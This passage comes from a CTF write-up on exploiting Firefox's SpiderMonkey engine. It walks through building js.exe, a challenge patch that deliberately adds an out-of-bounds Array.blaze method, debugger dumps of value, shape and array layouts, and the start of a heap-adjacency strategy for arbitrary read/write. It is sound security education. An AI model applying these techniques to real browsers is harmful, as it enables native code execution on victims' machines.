JavaScript interpreter, js.exe. It is full of hardcoded ugly offsets, and would have no chance to land elsewhere than on my system with this specific build of js.exe. • The second exploit, kaizen.js, is meant to be a net improvement of basic.js. It still targets the JavaScript interpreter itself, but this time, it resolves dynamically a bunch of things like a big boy. It also uses the baseline JIT to have it generate ROP gadgets. • The third exploit, ifrit.js, finally targets the Firefox browser with a little extra. Instead of just leveraging the baseline JIT to generate one or two ROP gadgets, we make it JIT a whole native code payload. No need to ROP, scan for finding Windows API addresses or to create a writable and executable memory region anymore. We just redirect the execution flow to our payload inside the JIT code. This might be the less dull / interesting part for people that knows SpiderMonkey and have been doing browser exploitation already :). Before starting, for those who do not feel like reading through the whole post: TL;DR I have created a blazefox GitHub repository that you can clone with all the materials. In the repository you can find: • sm.js which is the debugger extension mentioned above, • The source code of the three exploits in exploits, • A 64-bit debug build of the JavaScript shell along with private symbol information in js-asserts.7z, and a release build in js-release.7z, • The scripts I used to build the Bring Your Own Payload technique in scripts, • The sources that have been used to build js-release so that you can do source-level debugging in WinDbg in src/js, • A 64-bit build of the Firefox binaries along with private symbol information for xul.dll in ff-bin.7z.001 and ff-bin.7z.002. All right, let's buckle up and hit the road now! Setting it up Naturally we are going to have to set-up a debugging environment. I would suggest to create a virtual machine for this as you are going to have to install a bunch of stuff you might not want to install on your personal machine. First things first, let's get the code. Mozilla uses mercurial for development, but they also maintain a read-only GIT mirror. I recommend to just shallow clone this repository to make it faster (the repository is about ~420MB): >git clone --depth 1 https://github.com/mozilla/gecko-dev.git Cloning into 'gecko-dev'... remote: Enumerating objects: 264314, done. remote: Counting objects: 100% (264314/264314), done. remote: Compressing objects: 100% (211568/211568), done. remote: Total 264314 (delta 79982), reused 140844 (delta 44268), pack-reused 0 receiving objects: 100% (264314/26431 Receiving objects: 100% (264314/264314), 418.27 MiB | 981.00 KiB/s, done. Resolving deltas: 100% (79982/79982), done. Checking out files: 100% (261054/261054), done.  Sweet. For now we are interested only in building the JavaScript Shell interpreter that is part of the SpiderMonkey tree. js.exe is a simple command-line utility that can run JavaScript code. It is much faster to compile but also more importantly easier to attack and reason about. We already are about to be dropped in a sea of code so let's focus on something smaller first. Before compiling though, grab the blaze.patch file (no need to understand it just yet): diff -r ee6283795f41 js/src/builtin/Array.cpp --- a/js/src/builtin/Array.cpp Sat Apr 07 00:55:15 2018 +0300 +++ b/js/src/builtin/Array.cpp Sun Apr 08 00:01:23 2018 +0000 @@ -192,6 +192,20 @@ return ToLength(cx, value, lengthp); } +static MOZ_ALWAYS_INLINE bool +BlazeSetLengthProperty(JSContext* cx, HandleObject obj, uint64_t length) +{ + if (obj->is<ArrayObject>()) { + obj->as<ArrayObject>().setLengthInt32(length); + obj->as<ArrayObject>().setCapacityInt32(length); + obj->as<ArrayObject>().setInitializedLengthInt32(length); + return true; + } + return false; +} + + + /* * Determine if the id represents an array index. * @@ -1578,6 +1592,23 @@ return DenseElementResult::Success; } +bool js::array_blaze(JSContext* cx, unsigned argc, Value* vp) +{ + CallArgs args = CallArgsFromVp(argc, vp); + RootedObject obj(cx, ToObject(cx, args.thisv())); + if (!obj) + return false; + + if (!BlazeSetLengthProperty(cx, obj, 420)) + return false; + + //uint64_t l = obj.as<ArrayObject>().setLength(cx, 420); + + args.rval().setObject(*obj); + return true; +} + + // ES2017 draft rev 1b0184bc17fc09a8ddcf4aeec9b6d9fcac4eafce // 22.1.3.21 Array.prototype.reverse ( ) bool @@ -3511,6 +3542,8 @@ JS_FN("unshift", array_unshift, 1,0), JS_FNINFO("splice", array_splice, &array_splice_info, 2,0), + JS_FN("blaze", array_blaze, 0,0), + /* Pythonic sequence methods. */ JS_SELF_HOSTED_FN("concat", "ArrayConcat", 1,0), JS_INLINABLE_FN("slice", array_slice, 2,0, ArraySlice), diff -r ee6283795f41 js/src/builtin/Array.h --- a/js/src/builtin/Array.h Sat Apr 07 00:55:15 2018 +0300 +++ b/js/src/builtin/Array.h Sun Apr 08 00:01:23 2018 +0000 @@ -166,6 +166,9 @@ array_reverse(JSContext* cx, unsigned argc, js::Value* vp); extern bool +array_blaze(JSContext* cx, unsigned argc, js::Value* vp); + +extern bool array_splice(JSContext* cx, unsigned argc, js::Value* vp); extern const JSJitInfo array_splice_info; diff -r ee6283795f41 js/src/vm/ArrayObject.h --- a/js/src/vm/ArrayObject.h Sat Apr 07 00:55:15 2018 +0300 +++ b/js/src/vm/ArrayObject.h Sun Apr 08 00:01:23 2018 +0000 @@ -60,6 +60,14 @@ getElementsHeader()->length = length; } + void setCapacityInt32(uint32_t length) { + getElementsHeader()->capacity = length; + } + + void setInitializedLengthInt32(uint32_t length) { + getElementsHeader()->initializedLength = length; + } + // Make an array object with the specified initial state. static inline ArrayObject* createArray(JSContext* cx,  Apply the patch like in the below and just double-check it has been properly applied (you should not run into any conflicts): >cd gecko-dev\js gecko-dev\js>git apply c:\work\codes\blazefox\blaze.patch gecko-dev\js>git diff diff --git a/js/src/builtin/Array.cpp b/js/src/builtin/Array.cpp index 1655adbf58..e2ee96dd5e 100644 --- a/js/src/builtin/Array.cpp +++ b/js/src/builtin/Array.cpp @@ -202,6 +202,20 @@ GetLengthProperty(JSContext* cx, HandleObject obj, uint64_t* lengthp) return ToLength(cx, value, lengthp); } +static MOZ_ALWAYS_INLINE bool +BlazeSetLengthProperty(JSContext* cx, HandleObject obj, uint64_t length) +{ + if (obj->is<ArrayObject>()) { + obj->as<ArrayObject>().setLengthInt32(length); + obj->as<ArrayObject>().setCapacityInt32(length); + obj->as<ArrayObject>().setInitializedLengthInt32(length); + return true; + } + return false; +}  At this point you can install Mozilla-Build which is a meta-installer that provides you every tools necessary to do development (toolchain, various scripts, etc.) on Mozilla. The latest available version at the time of writing is the version 3.2 which is available here: MozillaBuildSetup-3.2.exe. Once this is installed, start-up a Mozilla shell by running the start-shell.bat batch file. Go to the location of your clone in js\src folder and type the following to configure an x64 debug build of js.exe: [email protected] /d/gecko-dev/js/src autoconf-2.13

[email protected] /d/gecko-dev/js/src$mkdir build.asserts [email protected] /d/gecko-dev/js/src$ cd build.asserts

[email protected] /d/gecko-dev/js/src/build.asserts$../configure --host=x86_64-pc-mingw32 --target=x86_64-pc-mingw32 --enable-debug  Kick off the compilation with mozmake: [email protected] /d/gecko-dev/js/src/build.asserts$ mozmake -j2


Then, you should be able to toss ./js/src/js.exe, ./mozglue/build/mozglue.dll and ./config/external/nspr/pr/nspr4.dll in a directory and voilà:

[email protected] ~/mozilla-central/js/src/build.asserts/js/src
$js.exe --version JavaScript-C64.0a1  For an optimized build you can invoke configure this way: [email protected] /d/gecko-dev/js/src/build.opt$ ../configure --host=x86_64-pc-mingw32 --target=x86_64-pc-mingw32 --disable-debug --enable-optimize


SpiderMonkey

Background

SpiderMonkey is the name of Mozilla's JavaScript engine, its source code is available on Github via the gecko-dev repository (under the js directory). SpiderMonkey is used by Firefox and more precisely by Gecko, its web-engine. You can even embed the interpreter in your own third-party applications if you fancy it. The project is fairly big, and here are some rough stats about it:

• ~3k Classes,
• ~576k Lines of code,
• ~1.2k Files,
• ~48k Functions.

As you can see on the tree map view below (the bigger, the more lines; the darker the blue, the higher the cyclomatic complexity) the engine is basically split in six big parts: the JIT compilers engine called Baseline and IonMonkey in the jit directory, the front-end in the frontend directory, the JavaScript virtual-machine in the vm directory, a bunch of builtins in the builtin directory, a garbage collector in the gc directory, and... WebAssembly in the wasm directory.

Most of the stuff I have looked at for now live in vm, builtin and gc folders. Another good thing going on for us is that there is also a fair amount of public documentation about SpiderMoneky, its internals, design, etc.

Here are a few links that I found interesting (some might be out of date, but at this point we are just trying to digest every bit of public information we can find) if you would like to get even more background before going further:

JS::Values and JSObjects

The first thing you might be curious about is how native JavaScript object are laid out in memory. Let's create a small script file with a few different native types and dump them directly from memory (do not forget to load the symbols). Before doing that though, a useful trick to know is to set a breakpoint to a function that is rarely called, like Math.atan2 for example. As you can pass arbitrary JavaScript objects to the function, it is then very easy to retrieve its address from inside the debugger. You can also use objectAddress which is only accessible in the shell but is very useful at times.

js> a = {}
({})

"000002576F8801A0"


Another pretty useful method is dumpObject but this one is only available from a debug build of the shell:

js> a = {doare : 1}
({doare:1})

js> dumpObject(a)
object 20003e8e160
global 20003e8d060 [global]
class 7ff624d94218 Object
lazy group
flags:
proto <Object at 20003e90040>
properties:
"doare": 1 (shape 20003eb1ad8 enumerate slot 0)


There are a bunch of other potentially interesting utility functions exposed to JavaScript via the shell and If you would like to enumerate them you can run Object.getOwnPropertyNames(this):

js> Object.getOwnPropertyNames(this)
["undefined", "Boolean", "JSON", "Date", "Math", "Number", "String", "RegExp", "InternalError", "EvalError", "RangeError", "TypeError", "URIError", "ArrayBuffer", "Int8Array", "Uint8Array", "Int16Array", "Uint16Array", "Int32Array", "Uint32Array", "Float32Array", "Float64Array", "Uint8ClampedArray", "Proxy", "WeakMap", "Map", ..]


To break in the debugger when the Math.atan2 JavaScript function is called you can set a breakpoint on the below symbol:

0:001> bp js!js::math_atan2


Now just create a foo.js file with the following content:

'use strict';

const A = 0x1337;

const B = 13.37;

const C = [1, 2, 3, 4, 5];


At this point you have two choices: either you load the above script into the JavaScript shell and attach a debugger or what I encourage is to trace the program execution with TTD. It makes things so much easier when you are trying to investigate complex software. If you have never tried it, do it now and you will understand.

Time to load the trace and have a look around:

0:001> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff69b3fe140 56              push    rsi

0:000> lsa .
260: }
261:
262: bool
263: js::math_atan2(JSContext* cx, unsigned argc, Value* vp)
>  264: {
265:     CallArgs args = CallArgsFromVp(argc, vp);
266:
267:     return math_atan2_handle(cx, args.get(0), args.get(1), args.rval());
268: }
269:


At this point you should be broken into the debugger like in the above. To be able to inspect the passed JavaScript object, we need to understand how JavaScript arguments are passed to native C++ function.

The way it works is that vp is a pointer to an array of JS::Value pointers of size argc + 2 (one is reserved for the return value / the caller and one is used for the this object). Functions usually do not access the array via vp directly. They wrap it in a JS::CallArgs object that abstracts away the need to calculate the number of JS::Value as well as providing useful functionalities like: JS::CallArgs::get, JS::CallArgs::rval, etc. It also abstracts away GC related operations to properly keep the object alive. So let's just dump the memory pointed by vp:

0:000> dqs @r8 [email protected]+2
0000028f87ab8198  fffe028f877a9700
0000028f87ab81a0  fffe028f87780180
0000028f87ab81a8  fff8800000001337


First thing we notice is that every Value objects sound to have their high-bits set. Usually, it is a sign of clever hax to encode more information (type?) in a pointer as this part of the address space is not addressable from user-mode on Windows.

At least we recognize the 0x1337 value which is something. Let's move on to the second invocation of Addressnow:

0:000> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff69b3fe140 56              push    rsi

0:000> dqs @r8 [email protected]+2
0000028f87ab8198  fffe028f877a9700
0000028f87ab81a0  fffe028f87780180
0000028f87ab81a8  402abd70a3d70a3d

0:000> .formats 402abd70a3d70a3d
Evaluate expression:
Hex:     402abd70a3d70a3d
Double:  13.37


Another constant we recognize. This time, the entire quad-word is used to represent the double value. And finally, here is the Array object passed to the third invocation of Address:

0:000> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff69b3fe140 56              push    rsi

0:000> dqs @r8 [email protected]+2
0000028f87ab8198  fffe028f877a9700
0000028f87ab81a0  fffe028f87780180
0000028f87ab81a8  fffe028f87790400


Interesting. Well, if we look at the JS::Value structure it sounds like the lower part of the quad-word is a pointer to some object.

0:000> dt -r2 js::value
+0x000 asBits_          : Uint8B
+0x000 asDouble_        : Float
+0x000 s_               : JS::Value::<unnamed-type-s_>
+0x000 i32_             : Int4B
+0x000 u32_             : Uint4B
+0x000 why_             : JSWhyMagic


By looking at public/Value.h we quickly understand what is going with what we have seen above. The 17 higher bits (referred to as the JSVAL_TAG in the source-code) of a JS::Value is used to encode type information. The lower 47 bits (referred to as JSVAL_TAG_SHIFT) are either the value of trivial types (integer, booleans, etc.) or a pointer to a JSObject. This part is called the payload_.

union alignas(8) Value {
private:
uint64_t asBits_;
double asDouble_;

struct {
union {
int32_t i32_;
uint32_t u32_;
JSWhyMagic why_;


Now let's take for example the JS::Value 0xfff8800000001337. To extract its tag we can right shift it with 47, and to extract the payload (an integer here, a trivial type) we can mask it with 2**47 - 1. Same with the array JS::Value from above.

In [5]: v = 0xfff8800000001337

In [6]: hex(v >> 47)
Out[6]: '0x1fff1L'

In [7]: hex(v & ((2**47) - 1))
Out[7]: '0x1337L'

In [8]: v = 0xfffe028f877a9700

In [9]: hex(v >> 47)
Out[9]: '0x1fffcL'

In [10]: hex(v & ((2**47) - 1))
Out[10]: '0x28f877a9700L'


The 0x1fff1 constant from above is JSVAL_TAG_INT32 and 0x1fffc is JSVAL_TAG_OBJECT as defined in JSValueType which makes sense:

enum JSValueType : uint8_t
{
JSVAL_TYPE_DOUBLE              = 0x00,
JSVAL_TYPE_INT32               = 0x01,
JSVAL_TYPE_BOOLEAN             = 0x02,
JSVAL_TYPE_UNDEFINED           = 0x03,
JSVAL_TYPE_NULL                = 0x04,
JSVAL_TYPE_MAGIC               = 0x05,
JSVAL_TYPE_STRING              = 0x06,
JSVAL_TYPE_SYMBOL              = 0x07,
JSVAL_TYPE_PRIVATE_GCTHING     = 0x08,
JSVAL_TYPE_OBJECT              = 0x0c,

// These never appear in a jsval; they are only provided as an out-of-band
// value.
JSVAL_TYPE_UNKNOWN             = 0x20,
JSVAL_TYPE_MISSING             = 0x21
};

{
JSVAL_TAG_MAX_DOUBLE           = 0x1FFF0,
JSVAL_TAG_INT32                = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_INT32,
JSVAL_TAG_UNDEFINED            = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_UNDEFINED,
JSVAL_TAG_NULL                 = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_NULL,
JSVAL_TAG_BOOLEAN              = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_BOOLEAN,
JSVAL_TAG_MAGIC                = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_MAGIC,
JSVAL_TAG_STRING               = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_STRING,
JSVAL_TAG_SYMBOL               = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_SYMBOL,
JSVAL_TAG_PRIVATE_GCTHING      = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_PRIVATE_GCTHING,
JSVAL_TAG_OBJECT               = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_OBJECT
} JS_ENUM_FOOTER(JSValueTag);


Now that we know what is a JS::Value, let's have a look at what an Array looks like in memory as this is will become useful later. Restart the target and skip the first double breaks:

0:000> .restart /f

0:008> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff69b3fe140 56              push    rsi

0:000> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff69b3fe140 56              push    rsi

0:000> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff69b3fe140 56              push    rsi

0:000> dqs @r8 [email protected]+2
0000027abf5b8198  fffe027abf2a9480
0000027abf5b81a0  fffe027abf280140
0000027abf5b81a8  fffe027abf2900a0

0:000> dqs 27abf2900a0
0000027abf2900a0  0000027abf27ab20
0000027abf2900a8  0000027abf2997e8
0000027abf2900b0  0000000000000000
0000027abf2900b8  0000027abf2900d0
0000027abf2900c0  0000000500000000
0000027abf2900c8  0000000500000006
0000027abf2900d0  fff8800000000001
0000027abf2900d8  fff8800000000002
0000027abf2900e0  fff8800000000003
0000027abf2900e8  fff8800000000004
0000027abf2900f0  fff8800000000005
0000027abf2900f8  4f4f4f4f4f4f4f4f


At this point we recognize the content the array: it contains five integers encoded as JS::Value from 1 to 5. We can also kind of see what could potentially be a size and a capacity but it is hard to guess the rest.

0:000> dt JSObject
+0x000 group_           : js::GCPtr<js::ObjectGroup *>
+0x008 shapeOrExpando_  : Ptr64 Void

0:000> dt js::NativeObject
+0x000 group_           : js::GCPtr<js::ObjectGroup *>
+0x008 shapeOrExpando_  : Ptr64 Void
+0x010 slots_           : Ptr64 js::HeapSlot
+0x018 elements_        : Ptr64 js::HeapSlot

0:000> dt js::ArrayObject
+0x000 group_           : js::GCPtr<js::ObjectGroup *>
+0x008 shapeOrExpando_  : Ptr64 Void
+0x010 slots_           : Ptr64 js::HeapSlot
+0x018 elements_        : Ptr64 js::HeapSlot


The JS::ArrayObject is defined in the vm/ArrayObject.h file and it subclasses the JS::NativeObject class (JS::NativeObject subclasses JS::ShapedObject which naturally subclasses JSObject). Note that it is also basically subclassed by every other JavaScript objects as you can see in the below diagram:

A native object in SpiderMonkey is basically made of two components:

1. a shape object which is used to describe the properties, the class of the said object, more on that just a bit below (pointed by the field shapeOrExpando_).
2. storage to store elements or the value of properties.

Let's switch gears and have a look at how object properties are stored in memory.

Shapes

As mentioned above, the role of a shape object is to describe the various properties that an object has. You can, conceptually, think of it as some sort of hash table where the keys are the property names and the values are the slot number of where the property content is actually stored.

Before reading further though, I recommend that you watch a very short presentation made by @bmeurer and @mathias describing how properties are stored in JavaScript engines: JavaScript engine fundamentals: Shapes and Inline Caches. As they did a very good job of explaining things clearly, it should help clear up what comes next and it also means I don't have to introduce things as much.

Consider the below JavaScript code:

'use strict';

const A = {
foo : 1337,
blah : 'doar-e'
};

const B = {
foo : 1338,
blah : 'sup'
};

const C = {
foo : 1338,
blah : 'sup'
};
C.another = true;


Throw it in the shell under your favorite debugger to have a closer look at this shape object:

0:000> bp js!js::math_atan2

0:000> g
Breakpoint 0 hit
Time Travel Position: D454:D
js!js::math_atan2:
00007ff776c9e140 56              push    rsi

0:000> ?? vp[2].asBits_
unsigned int64 0xfffe01fce637e1c0

0:000> dt js::NativeObject 1fce637e1c0 shapeOrExpando_
+0x008 shapeOrExpando_ : 0x000001fce63ae880 Void

0:000> ?? ((js::shape*)0x000001fce63ae880)
class js::Shape * 0x000001fce63ae880
+0x000 base_            : js::GCPtr<js::BaseShape *>
+0x008 propid_          : js::PreBarriered<jsid>
+0x010 immutableFlags   : 0x2000001
+0x014 attrs            : 0x1 ''
+0x015 mutableFlags     : 0 ''
+0x018 parent           : js::GCPtr<js::Shape *>
+0x020 kids             : js::KidsPointer
+0x020 listp            : (null)

0:000> ?? ((js::shape*)0x000001fce63ae880)->propid_.value
struct jsid
+0x000 asBits           : 0x000001fce63a7e20


In the implementation, a JS::Shape describes a single property; its name and slot number. To describe several of them, shapes are linked together via the parent field (and others). The slot number (which is used to find the property content later) is stored in the lower bits of the immutableFlags field. The property name is stored as a jsid in the propid_ field.

I understand this is a lot of abstract information thrown at your face right now. But let's peel the onion to clear things up; starting with a closer look at the above shape. This JS::Shape object describes a property which value is stored in the slot number 1 (0x2000001 & SLOT_MASK). To get its name we dump its propid_ field which is 0x000001fce63a7e20.

What is a jsid? A jsid is another type of tagged pointer where type information is encoded in the lower three bits this time.

Thanks to those lower bits we know that this address is pointing to a string and it should match one of our property name :).

0:000> ?? (char*)((JSString*)0x000001fce63a7e20)->d.inlineStorageLatin1
char * 0x000001fce63a7e28
"blah"


Good. As we mentioned above, shape objects are linked together. If we dump its parent we expect to find the shape that described our second property foo:

0:000> ?? ((js::shape*)0x000001fce63ae880)->parent.value
class js::Shape * 0x000001fce63ae858
+0x000 base_            : js::GCPtr<js::BaseShape *>
+0x008 propid_          : js::PreBarriered<jsid>
+0x010 immutableFlags   : 0x2000000
+0x014 attrs            : 0x1 ''
+0x015 mutableFlags     : 0x2 ''
+0x018 parent           : js::GCPtr<js::Shape *>
+0x020 kids             : js::KidsPointer
+0x020 listp            : 0x000001fce63ae880 js::GCPtr<js::Shape *>

0:000> ?? ((js::shape*)0x000001fce63ae880)->parent.value->propid_.value
struct jsid
+0x000 asBits           : 0x000001fce633d700

0:000> ?? (char*)((JSString*)0x000001fce633d700)->d.inlineStorageLatin1
char * 0x000001fce633d708
"foo"


Press g to continue the execution and check if the second object shares the same shape hierarchy (0x000001fce63ae880):

0:000> g
Breakpoint 0 hit
Time Travel Position: D484:D
js!js::math_atan2:
00007ff776c9e140 56              push    rsi

0:000> ?? vp[2].asBits_
unsigned int64 0xfffe01fce637e1f0

0:000> dt js::NativeObject 1fce637e1f0 shapeOrExpando_
+0x008 shapeOrExpando_ : 0x000001fce63ae880 Void


As expected B indeed shares it even though A and B store different property values. Care to guess what is going to happen when we add another property to C now? To find out, press g one last time:

0:000> g
Breakpoint 0 hit
Time Travel Position: D493:D
js!js::math_atan2:
00007ff776c9e140 56              push    rsi

0:000> ?? vp[2].asBits_
union JS::Value
+0x000 asBits_          : 0xfffe01e7c247e1c0

0:000> dt js::NativeObject 1fce637e1f0 shapeOrExpando_
+0x008 shapeOrExpando_ : 0x000001fce63b10d8 Void

0:000> ?? ((js::shape*)0x000001fce63b10d8)
class js::Shape * 0x000001fce63b10d8
+0x000 base_            : js::GCPtr<js::BaseShape *>
+0x008 propid_          : js::PreBarriered<jsid>
+0x010 immutableFlags   : 0x2000002
+0x014 attrs            : 0x1 ''
+0x015 mutableFlags     : 0 ''
+0x018 parent           : js::GCPtr<js::Shape *>
+0x020 kids             : js::KidsPointer
+0x020 listp            : (null)

0:000> ?? ((js::shape*)0x000001fce63b10d8)->propid_.value
struct jsid
+0x000 asBits           : 0x000001fce63a7e60

0:000> ?? (char*)((JSString*)0x000001fce63a7e60)->d.inlineStorageLatin1
char * 0x000001fce63a7e68
"another"

0:000> ?? ((js::shape*)0x000001fce63b10d8)->parent.value
class js::Shape * 0x000001fce63ae880


A new JS::Shape gets allocated (0x000001e7c24b1150) and its parent is the previous set of shapes (0x000001e7c24b1150). A bit like prepending a node in a linked-list.

Slots

In the previous section, we talked a lot about how property names are stored in memory. Now where are property values?

To answer this question we throw the previous TTD trace we acquired in our debugger and go back at the first call to Math.atan2:

Breakpoint 0 hit
Time Travel Position: D454:D
js!js::math_atan2:
00007ff776c9e140 56              push    rsi

0:000> ?? vp[2].asBits_
unsigned int64 0xfffe01fce637e1c0


Because we went through the process of dumping the js::Shape objects describing the foo and the blah properties already, we know that their property values are respectively stored in slot zero and slot one. To look at those, we just dump the memory right after the js::NativeObject:

0:000> ?? vp[2].asBits_
unsigned int64 0xfffe01fce637e1c0
0:000> dt js::NativeObject 1fce637e1c0
+0x000 group_           : js::GCPtr<js::ObjectGroup *>
+0x008 shapeOrExpando_  : 0x000001fce63ae880 Void
+0x010 slots_           : (null)
+0x018 elements_        : 0x00007ff77707dac0 js::HeapSlot

0:000> dqs 1fce637e1c0
000001fce637e1c0  000001fce637a520
000001fce637e1c8  000001fce63ae880
000001fce637e1d0  0000000000000000
000001fce637e1d8  00007ff77707dac0 js!emptyElementsHeader+0x10
000001fce637e1e0  fff8800000000539 <- foo
000001fce637e1e8  fffb01fce63a7e40 <- blah


Naturally, the second property is another js::Value pointing to a JSString and we can dump it as well:

0:000> ?? (char*)((JSString*)0x1fce63a7e40)->d.inlineStorageLatin1
char * 0x000001fce63a7e48
"doar-e"


Here is a diagram describing the hierarchy of objects to clear any potential confusion:

This is really as much internals as I wanted to cover as it should be enough to be understand what follows. You should also be able to inspect most JavaScript objects with this background. The only sort-of of odd-balls I have encountered are JavaScript Arrays that stores the length property, for example in an js::ObjectElements object; but that is about it.

0:000> dt js::ObjectElements
+0x000 flags            : Uint4B
+0x004 initializedLength : Uint4B
+0x008 capacity         : Uint4B
+0x00c length           : Uint4B


Exploits

Now that we all are SpiderMonkey experts, let's have a look at the actual challenge. Note that clearly we did not need the above context to just write a simple exploit. The thing is, just writing an exploit was never my goal.

The vulnerability

After taking a closer look at the blaze.patch diff it becomes pretty clear that the author has added a method to Array objects called blaze. This new method changes the internal size field to 420, because it was Blaze CTF after all :). This allows us to access out-of-bound off the backing buffer.

js> blz = []
[]

js> blz.length
0

js> blz.blaze() == undefined
false

js> blz.length
420


One little quirk to keep in mind when using the debug build of js.exe is that you need to ensure that the blaze'd object is never displayed by the interpreter. If you do, the toString() function of the array iterates through every items and invokes their toString()'s. This basically blows up once you start reading out-of-bounds, and will most likely run into the below crash:

js> blz.blaze()
Assertion failure: (ptrBits & 0x7) == 0, at c:\Users\over\mozilla-central\js\src\build-release.x64\dist\include\js/Value.h:809

(1d7c.2b3c): Break instruction exception - code 80000003 (!!! second chance !!!)
*** WARNING: Unable to verify checksum for c:\work\codes\blazefox\js-asserts\js.exe
js!JS::Value::toGCThing+0x75 [inlined in js!JS::MutableHandle<JS::Value>::set+0x97]:
00007ff6ac86d7d7 cc              int     3


An easy work-around for this annoyance is to either provide a file directly to the JavaScript shell or to use an expression that does not return the resulting array, like blz.blaze() == undefined. Note that, naturally, you will not encounter the above assertion in the release build.

basic.js

As introduced above, our goal with this exploit is to pop calc. We don't care about how unreliable or crappy the exploit is: we just want to get native code execution inside the JavaScript shell. For this exploit, I have exploited a debug build of the shell where asserts are enabled. I encourage you to follow, and for that I have shared the binaries (along with symbol information) here: js-asserts.

With an out-of-bounds like this one what we want is to have two adjacent arrays and use the first one to corrupt the second one. With this set-up, we can convert a limited relative memory read / write access primitive to an arbitrary read / write primitive.

Now, we have to keep in mind that Arrays store js::Values and not raw values. If you were to out-of-bounds write the value 0x1337 in JavaScript, you would actually write the value 0xfff8800000001337 in memory. It felt a bit weird at the beginning, but as usual you get used to this type of thing pretty quickly :-).

Anyway moving on: time to have a closer look at Arrays. For that, I highly recommend grabbing an execution trace of a simple JavaScript file creating arrays with TTD. Once traced, you can load it in the debugger in order to figure out how Arrays are allocated and where.

Note that to inspect JavaScript objects from the debugger I use a JavaScript extension I wrote called sm.js that you can find here.

0:000> bp js!js::math_atan2

0:000> g
Breakpoint 0 hit
Time Travel Position: D5DC:D
js!js::math_atan2:
00007ff74704e140 56              push    rsi

0:000> !smdump_jsvalue vp[2].asBits_
25849101b00: js!js::ArrayObject:   Length: 4
25849101b00: js!js::ArrayObject: Capacity: 6
25849101b00: js!js::ArrayObject:  Content: [0x1, 0x2, 0x3, 0x4]
@$smdump_jsvalue(vp[2].asBits_) 0:000> dx -g @$cursession.TTD.Calls("js!js::allocate<JSObject,js::NoGC>").Where(p => p.ReturnValue == 0x25849101b00)
=====================================================================================================================================================================================================================
=           = (+) EventType = (+) ThreadId = (+) UniqueThreadId = (+) TimeStart = (+) TimeEnd = (+) Function                          = (+) FunctionAddress = (+) ReturnAddress = (+) ReturnValue  = (+) Parameters =
=====================================================================================================================================================================================================================
= [0x14]    - Call          - 0x32f8       - 0x2                - D58F:723      - D58F:77C    - js!js::Allocate<JSObject,js::NoGC>    - 0x7ff746f841b0      - 0x7ff746b4b702    - 0x25849101b00    - {...}          =
=====================================================================================================================================================================================================================

0:000> !tt D58F:723
Setting position: D58F:723
Time Travel Position: D58F:723
js!js::Allocate<JSObject,js::NoGC>:
00007ff746f841b0 4883ec28        sub     rsp,28h

0:000> kc
# Call Site
00 js!js::Allocate<JSObject,js::NoGC>
01 js!js::NewObjectCache::newObjectFromHit
02 js!NewArrayTryUseGroup<4294967295>
03 js!js::NewCopiedArrayForCallingAllocationSite
04 js!ArrayConstructorImpl
05 js!js::ArrayConstructor
06 js!InternalConstruct
07 js!Interpret
08 js!js::RunScript
09 js!js::ExecuteKernel
0a js!js::Execute
0b js!JS_ExecuteScript
0c js!Process
0d js!main
0e js!__scrt_common_main_seh

0:000> dv
kind = OBJECT8_BACKGROUND (0n9)
nDynamicSlots = 0
heap = DefaultHeap (0n0)


Cool. According to the above, new Array(1, 2, 3, 4) is allocated from the Nursery heap (or DefaultHeap) and is an OBJECT8_BACKGROUND. This kind of objects are 0x60 bytes long as you can see below:

0:000> x js!js::gc::Arena::ThingSizes
00007ff7474415b0 js!js::gc::Arena::ThingSizes = <no type information>

0:000> dds 00007ff7474415b0 + 9*4 l1
00007ff7474415d4  00000060


The Nursery heap is 16MB at most (by default, but can be tweaked with the --nursery-size option). One thing nice for us about this allocator is that there is no randomization whatsoever. If we allocate two arrays, there is a high chance that they are adjacent in memory. The other awesome thing is that TypedArrays are allocated there too.

As a first experiment we can try to have an Array and a TypedArray adjacent in memory and confirm things in a debugger. The script I used is pretty dumb as you can see:

const Smalls = new Array(1, 2, 3, 4);
const U8A = new Uint8Array(8);


Let's have a look at it from the debugger now:

(2ab8.22d4): Break instruction exception - code 80000003 (first chance)
ntdll!DbgBreakPoint:
00007fffb8c33050 cc              int     3
0:005> bp js!js::math_atan2

0:005> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff74704e140 56              push    rsi

0:000> ?? vp[2].asBits_
unsigned int64 0xfffe013ebb2019e0

JavaScript script successfully loaded from 'c:\work\codes\blazefox\sm\sm.js'

0:000> !smdump_jsvalue vp[2].asBits_
13ebb2019e0: js!js::ArrayObject:   Length: 4
13ebb2019e0: js!js::ArrayObject: Capacity: 6
13ebb2019e0: js!js::ArrayObject:  Content: [0x1, 0x2, 0x3, 0x4]
@$smdump_jsvalue(vp[2].asBits_) 0:000> ? 0xfffe013ebb2019e0 + 60 Evaluate expression: -561581014377920 = fffe013ebb201a40 0:000> !smdump_jsvalue 0xfffe013ebb201a40 13ebb201a40: js!js::TypedArrayObject: Type: Uint8Array 13ebb201a40: js!js::TypedArrayObject: Length: 8 13ebb201a40: js!js::TypedArrayObject: ByteLength: 8 13ebb201a40: js!js::TypedArrayObject: ByteOffset: 0 13ebb201a40: js!js::TypedArrayObject: Content: Uint8Array({Length:8, ...}) @$smdump_jsvalue(0xfffe013ebb201a40)


Cool, story checks out: the Array (which size is 0x60 bytes) is adjacent to the TypedArray. It might be a good occasion for me to tell you that between the time I compiled the debug build of the JavaScript shell and the time where I compiled the release version.. some core structures slightly changed which means that if you use sm.js on the debug one it will not work :). Here is an example of change illustrated below:

0:008> dt js::Shape
+0x000 base_            : js::GCPtr<js::BaseShape *>
+0x008 propid_          : js::PreBarriered<jsid>
+0x010 slotInfo         : Uint4B
+0x014 attrs            : UChar
+0x015 flags            : UChar
